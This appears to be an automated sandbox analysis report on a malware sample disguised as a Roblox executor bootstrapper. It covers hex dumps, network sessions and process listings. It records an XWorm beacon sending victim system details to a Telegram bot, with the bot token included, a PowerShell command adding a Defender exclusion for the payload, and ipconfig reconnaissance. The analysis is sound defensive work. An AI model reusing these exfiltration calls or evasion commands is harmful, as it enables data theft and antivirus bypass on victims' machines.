                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 00 00 0a 02 17 8d 2b 00 00 01 25 16 03 9c 7d 06 00 00 04 2a 3a 02 28 5b 00 00 0a 02 03 7d 06 00 00 04 2a 00 3a 02 28 5b 00 00 0a 02 03 7d 07 00 00 04 2a 00 1e 02 28 5b 00 00 0a 2a 3a 02 28 5b 00 00 0a 02 03 7d 08 00 00 04 2a 00 1e 02 7b 08 00 00 04 2a 1e 02 28 5b 00 00 0a 2a 1e 02 28 5b 00 00 0a 2a 3a 02 28 5b 00 00 0a 02 03 7d 09 00 00 04 2a 00 1e 02 7b 09 00 00 04 2a 2e 28 5c 00 00 0a 80 19 00 00 04 2a 8a 02 1f 1f 7d 1c 00 00 04 02 28 bd 00 00 06 02 02 7b 1c 00 00 04 17 58 8d 1b 01 00 02 7d 1b 00 00 04 2a 00 13 30 04 00 ae 00 00 00 16 00 00 11 05 3a 06 00 00 00 7e 5d 00 00 0a 2a 05 7e 19 00 00 04 58 0a 06 06 1d 62 03 04 93 61 58 0a 04 05 58 0b 04 17 58 0c 38 0e 00 00 00 06 06 1d 62 03 08 93 61 58 0a 08 17 58 0c 08 07 32 ee 06 06 1f 11 63 59 0a 06 06 1f
                                                                                        Data Ascii: +%}*:([}*:([}*([*:([}*{*([*([*:([}*{*.(\*}({X}*0:~]*~XbaXXX8baXX2cY
                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 6f 10 00 00 0a dc 08 2a 00 00 00 01 10 00 00 02 00 10 00 2a 3a 00 0d 00 00 00 00 22 02 16 28 5b 00 00 06 2a 00 00 00 1b 30 0a 00 41 00 00 00 1c 00 00 11 1f 40 28 06 06 00 06 0a 06 1f 22 6f 6a 00 00 0a 06 02 03 14 28 38 00 00 0a 28 c9 04 00 06 06 1f 22 6f 6a 00 00 0a 06 6f 6b 00 00 0a 0b dd 0d 00 00 00 06 39 06 00 00 00 06 6f 10 00 00 0a dc 07 2a 00 00 00 01 10 00 00 02 00 08 00 2a 32 00 0d 00 00 00 00 4a 02 3a 06 00 00 00 7e 3b 00 00 04 2a 7e 3a 00 00 04 2a 00 32 02 28 6c 00 00 0a 28 76 00 00 06 2a 00 00 00 32 02 72 3c 14 00 70 6f 6d 00 00 0a 2a 00 00 00 3a 0f 00 14 28 38 00 00 0a 28 6e 00 00 0a 2a 00 3a 0f 00 14 28 38 00 00 0a 28 6f 00 00 0a 2a 00 3a 0f 00 14 28 38 00 00 0a 28 70 00 00 0a 2a 00 3a 0f 00 14 28 38 00 00 0a 28 71 00 00 0a 2a 00 3a 0f 00 14
                                                                                        Data Ascii: o**:"([*0A@("oj(8("ojok9o**2J:~;*~:*2(l(v*2r<pom*:(8(n*:(8(o*:(8(p*:(8(q*:
                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 64 00 00 06 2a 72 be 14 00 70 28 38 00 00 0a 02 6f 82 00 00 0a 28 00 06 00 06 73 83 00 00 0a 7a 00 00 01 04 00 00 26 02 14 14 28 7f 00 00 06 2a 00 00 26 02 03 14 28 80 00 00 06 2a 00 00 13 30 06 00 29 00 00 00 1f 00 00 11 03 39 07 00 00 00 03 8e 3a 06 00 00 00 14 38 0c 00 00 00 73 f5 01 00 06 25 03 6f bf 01 00 06 0a 02 14 06 28 7f 00 00 06 2a 00 00 00 01 04 00 00 13 30 06 00 2a 00 00 00 20 00 00 11 04 39 07 00 00 00 04 8e 3a 06 00 00 00 14 38 0c 00 00 00 73 f5 01 00 06 25 04 6f bf 01 00 06 0a 02 14 03 06 28 81 00 00 06 2a 00 00 01 04 00 00 26 02 14 03 28 7f 00 00 06 2a 00 00 13 30 03 00 10 00 00 00 21 00 00 11 04 28 9e 01 00 06 0a 02 03 06 28 82 00 00 06 2a 01 04 00 00 2a 02 14 03 04 28 81 00 00 06 2a 00 13 30 05 00 17 00 00 00 22 00 00 11 05 28 9e 01 00
                                                                                        Data Ascii: d*rp(8o(sz&(*&(*0)9:8s%o(*0* 9:8s%o(*&(*0!((**(*0"(
                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 0e 00 00 1b 28 87 00 00 0a 28 00 06 00 06 73 55 01 00 06 7a 02 03 04 a5 0e 00 00 1b 05 6f 89 00 00 0a 2a 00 00 01 04 00 00 13 30 09 00 63 00 00 00 2c 00 00 11 05 14 fe 01 0a 06 3a 2a 00 00 00 05 75 0e 00 00 1b 3a 1f 00 00 00 72 01 17 00 70 28 38 00 00 0a d0 0e 00 00 1b 28 87 00 00 0a 28 00 06 00 06 73 55 01 00 06 7a 02 03 04 06 3a 0b 00 00 00 05 a5 0e 00 00 1b 38 09 00 00 00 12 01 fe 15 0e 00 00 1b 07 06 16 fe 01 0e 04 6f 8a 00 00 0a 8c 0e 00 00 1b 2a 00 01 04 00 00 46 d0 0e 00 00 1b 28 87 00 00 0a 03 6f 8b 00 00 0a 2a 00 00 1e 02 28 a3 00 00 06 2a 1e 02 7b 41 00 00 04 2a 1e 02 7b 42 00 00 04 2a 96 02 28 5b 00 00 0a 03 14 28 8c 00 00 0a 39 0b 00 00 00 72 a0 17 00 70 73 5f 00 00 0a 7a 02 03 7d 41 00 00 04 2a 00 00 3e 02 03 28 ac 00 00 06 02 04 7d 42 00 00
                                                                                        Data Ascii: ((sUzo*0c,:*u:rp(8((sUz:8o*F(o*(*{A*{B*([(9rps_z}A*>(}B
                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 22 02 03 7d 5f 00 00 04 2a 00 00 00 1e 02 7b 60 00 00 04 2a 22 02 03 7d 60 00 00 04 2a 00 00 00 1e 02 7b 61 00 00 04 2a 22 02 03 7d 61 00 00 04 2a 00 00 00 32 02 7c 53 00 00 04 28 94 00 00 0a 2a 00 00 00 36 02 03 73 95 00 00 0a 7d 53 00 00 04 2a 00 00 32 02 7c 54 00 00 04 28 aa 00 00 0a 2a 00 00 00 36 02 03 73 ab 00 00 0a 7d 54 00 00 04 2a 00 00 32 02 7c 55 00 00 04 28 66 00 00 0a 2a 00 00 00 36 02 03 73 67 00 00 0a 7d 55 00 00 04 2a 00 00 32 02 7c 56 00 00 04 28 ac 00 00 0a 2a 00 00 00 36 02 03 73 ad 00 00 0a 7d 56 00 00 04 2a 00 00 32 02 7c 57 00 00 04 28 68 00 00 0a 2a 00 00 00 36 02 03 73 69 00 00 0a 7d 57 00 00 04 2a 00 00 32 02 7c 58 00 00 04 28 64 00 00 0a 2a 00 00 00 36 02 03 73 65 00 00 0a 7d 58 00 00 04 2a 00 00 32 02 7c 59 00 00 04 28 ae 00 00
                                                                                        Data Ascii: "}_*{`*"}`*{a*"}a*2|S(*6s}S*2|T(*6s}T*2|U(f*6sg}U*2|V(*6s}V*2|W(h*6si}W*2|X(d*6se}X*2|Y(
                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 30 06 00 36 00 00 00 36 00 00 11 03 0a 16 0b 12 00 28 ae 00 00 0a 07 fe 02 16 fe 01 12 00 28 bb 00 00 0a 5f 39 10 00 00 00 72 22 18 00 70 72 79 15 00 70 73 81 00 00 0a 7a 02 03 7d 6a 00 00 04 2a 00 00 01 04 00 00 1e 02 7b 63 00 00 04 2a 1e 02 7b 64 00 00 04 2a 56 02 7b 64 00 00 04 25 3a 03 00 00 00 26 14 2a 28 82 00 00 0a 2a 00 00 13 30 04 00 3f 00 00 00 37 00 00 11 02 7b 6f 00 00 04 25 3a 07 00 00 00 26 16 38 05 00 00 00 28 a0 00 00 0a 0a 02 6f 12 01 00 06 28 80 05 00 06 3a 10 00 00 00 02 7c 67 00 00 04 7b 4f 00 00 04 3a 02 00 00 00 06 2a 06 17 58 2a 00 01 04 00 00 13 30 06 00 6d 00 00 00 38 00 00 11 02 7c 67 00 00 04 7b 4f 00 00 04 3a 06 00 00 00 7e 5d 00 00 0a 2a 02 7b 66 00 00 04 1b 3b 1e 00 00 00 02 7b 66 00 00 04 1f 09 3b 11 00 00 00 02 7b 66 00 00
                                                                                        Data Ascii: 066((_9r"prypsz}j*{c*{d*V{d%:&*(*0?7{o%:&8(o(:|g{O:*X*0m8|g{O:~]*{f;{f;{f


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.549709104.21.93.274437376C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 17:09:08 UTC81OUTGET /asset/discord.json HTTP/1.1
                                                                                        Host: getsolara.dev
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-13 17:09:08 UTC837INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 17:09:08 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=0, must-revalidate
                                                                                        ETag: W/"e1d895c526c3cd0cc3c6c0e3e7022f52"
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        x-content-type-options: nosniff
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9fjElwQj1wm1UJQkdmvYt0Fyb5QyroMaOq6uIPjoD%2B1uPvT%2B6dYMMs0tqecY%2F6KbuvkoHhbx6RDx9lKC5Nh%2B67djrnqo15DHr6RudNCiT%2Fz7Oj6hE3Tig8njQVN%2F4O2M"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Strict-Transport-Security: max-age=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d20ef85f88c42f2-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 17:09:08 UTC109INData Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 78 52 43 61 43 37 63 64 42 6e 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
                                                                                        Data Ascii: 67{ "args" : { "code" : "xRCaC7cdBn" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
                                                                                        2024-10-13 17:09:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.549710104.21.93.274437376C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 17:09:09 UTC56OUTGET /api/endpoint.json HTTP/1.1
                                                                                        Host: getsolara.dev
                                                                                        2024-10-13 17:09:09 UTC827INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 17:09:09 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=0, must-revalidate
                                                                                        ETag: W/"6d1289f045317b69a303a5bf178a762f"
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        x-content-type-options: nosniff
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ceUnvtEoGeI42YgGhpVZNn4a3lw3oIhWeVcoW0LnqmM6SxZPG7zL99mUsjFjQTYE6Iu7qp5kEpghErFOTgKWKBtDFtuzs1PPAbvbmLBT6ZxuY7uE%2F2oAVlVrf1BIQgka"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Strict-Transport-Security: max-age=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d20ef907f9472a7-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 17:09:09 UTC542INData Raw: 33 36 32 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 32 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 65 61 64 63 33 63 39 30 62 62 31 61 34 32 36 37 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 32 30 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 37 39 63 36 32 66 64 36 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
                                                                                        Data Ascii: 362{ "BootstrapperVersion": "1.22", "SupportedClient": "version-eadc3c90bb1a4267", "SoftwareVersion": "3.120", "BootstrapperUrl": "https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
                                                                                        2024-10-13 17:09:09 UTC331INData Raw: 65 20 4c 69 62 72 61 72 79 20 46 75 6e 63 74 69 6f 6e 73 20 41 64 64 65 64 5c 6e 5c 74 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2d 3e 28 68 74 74 70 73 3a 2f 2f 73 79 6e 61 70 73 65 78 64 6f 63 73 2e 67 69 74 68 75 62 2e 69 6f 2f 63 75 73 74 6f 6d 2d 6c 75 61 2d 66 75 6e 63 74 69 6f 6e 73 2f 63 6f 6e 73 6f 6c 65 2d 66 75 6e 63 74 69 6f 6e 73 2f 29 5c 6e 5b 2b 5d 20 6d 65 73 73 61 67 65 62 6f 78 5c 6e 5b 2b 5d 20 6c 7a 34 20 63 6f 6d 70 72 65 73 73 20 26 20 64 65 63 6f 6d 70 72 65 73 73 20 68 6f 74 66 69 78 5c 6e 5b 2b 5d 20 52 65 61 64 66 69 6c 65 20 6e 6f 77 20 65 72 72 6f 72 73 20 69 66 20 74 68 65 20 66 69 6c 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 5c 6e 5b 2b 5d 20 53 6f 6d 65 20 63 68 61 6e 67 65 73 20 74 6f 20 67 65 74 2f 73 65 74 20 68 69 64 64
                                                                                        Data Ascii: e Library Functions Added\n\tDocumentation->(https://synapsexdocs.github.io/custom-lua-functions/console-functions/)\n[+] messagebox\n[+] lz4 compress & decompress hotfix\n[+] Readfile now errors if the file doesn't exist\n[+] Some changes to get/set hidd
                                                                                        2024-10-13 17:09:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.549711128.116.44.34437376C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 17:09:11 UTC119OUTGET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
                                                                                        Host: clientsettings.roblox.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-13 17:09:11 UTC576INHTTP/1.1 200 OK
                                                                                        content-length: 119
                                                                                        content-type: application/json; charset=utf-8
                                                                                        date: Sun, 13 Oct 2024 17:09:10 GMT
                                                                                        server: Kestrel
                                                                                        cache-control: no-cache
                                                                                        strict-transport-security: max-age=3600
                                                                                        x-frame-options: SAMEORIGIN
                                                                                        roblox-machine-id: 11b4830c-8797-ab4f-7c17-aafded5200ae
                                                                                        x-roblox-region: us-central_rbx
                                                                                        x-roblox-edge: fra4
                                                                                        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
                                                                                        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
                                                                                        connection: close
                                                                                        2024-10-13 17:09:11 UTC119INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 34 36 2e 30 2e 36 34 36 30 37 30 30 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 65 61 64 63 33 63 39 30 62 62 31 61 34 32 36 37 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 30 2c 20 36 34 36 30 37 30 30 22 7d
                                                                                        Data Ascii: {"version":"0.646.0.6460700","clientVersionUpload":"version-eadc3c90bb1a4267","bootstrapperVersion":"1, 6, 0, 6460700"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.549712104.20.23.464437376C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 17:09:13 UTC99OUTGET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
                                                                                        Host: www.nodejs.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-13 17:09:14 UTC497INHTTP/1.1 307 Temporary Redirect
                                                                                        Date: Sun, 13 Oct 2024 17:09:14 GMT
                                                                                        Content-Type: text/plain
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=0, must-revalidate
                                                                                        location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-vercel-id: iad1::pknq5-1728839353984-0531878b2a8c
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d20efaa299f42d0-EWR
                                                                                        2024-10-13 17:09:14 UTC20INData Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
                                                                                        Data Ascii: fRedirecting...
                                                                                        2024-10-13 17:09:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.549999149.154.167.2204436524C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 17:10:02 UTC450OUTGET /bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A58ABE3825259C230781C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208TH9_M1_S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-13 17:10:02 UTC346INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Sun, 13 Oct 2024 17:10:02 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 73
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-10-13 17:10:02 UTC73INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 68 61 74 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
                                                                                        Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: chat not found"}


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:13:08:55
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\Desktop\8svMXMXNRn.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\8svMXMXNRn.exe"
                                                                                        Imagebase:0x7ff637390000
                                                                                        File size:815'440 bytes
                                                                                        MD5 hash:E91F3EC430934CF29CDA88D9B730D893
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:13:08:56
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe"
                                                                                        Imagebase:0x750000
                                                                                        File size:78'848 bytes
                                                                                        MD5 hash:B3A1A7EF45C3A920F515ADC541EE75F4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 88%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:13:08:56
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"
                                                                                        Imagebase:0x247bd6f0000
                                                                                        File size:815'104 bytes
                                                                                        MD5 hash:4B94B989B0FE7BEC6311153B309DFE81
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 63%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:13:08:56
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:13:09:00
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:13:09:00
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:13:09:05
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe" --oldBootstrapper "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" --isUpdate true
                                                                                        Imagebase:0x1ac8c7a0000
                                                                                        File size:819'200 bytes
                                                                                        MD5 hash:2A4DCF20B82896BE94EB538260C5FB93
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 63%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:13:09:05
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:13:09:06
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"cmd" /c ipconfig /all
                                                                                        Imagebase:0x7ff68ec20000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:13:09:06
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:13:09:06
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\ipconfig.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:ipconfig /all
                                                                                        Imagebase:0x7ff75a1d0000
                                                                                        File size:35'840 bytes
                                                                                        MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:13:09:07
